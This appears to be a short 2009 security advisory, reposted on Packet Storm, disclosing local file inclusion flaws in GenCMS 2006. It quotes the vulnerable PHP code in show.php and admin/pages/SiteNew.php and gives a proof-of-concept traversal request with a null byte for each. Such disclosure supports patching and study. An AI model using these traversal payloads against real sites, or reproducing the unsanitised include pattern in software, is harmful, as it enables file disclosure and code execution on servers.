GenCMS 2006 suffers from local file inclusion vulnerabilities.
f71e732ff7fa723993589579a23facd13213c6afa70bde71cde7b707b469cc51GenCMS
http://gencms.berlios.de/
eLwaux(c)2009
LFI
/show.php
----------------------------------------------------------------------------------------------------
18: $param = $_GET['p'];
19: if(empty($param)) $param = 'news';
20: //get right page
21: //$page = $param.'.php';
22:
23: //static or dynamic
24: if(GC_FULLSTATIC)
25: {
26: $page = $param.'.htm';
27: staticpage($page);
28: }
29: else
30: {
31: $page = GC_IPATH.'_base/sites/'.$param.'.php';
32: dynamicpage($page);
33: }
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00
LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
14: if(!empty($_GET['step'])) $Step = $_GET['step'];
23: if ($Step == "2")
24: {
25: // allgemeine settings
26: //include blocks from template config
27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
28: $TPLBlocks = explode(';',$TemplateSettings);
29: }
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed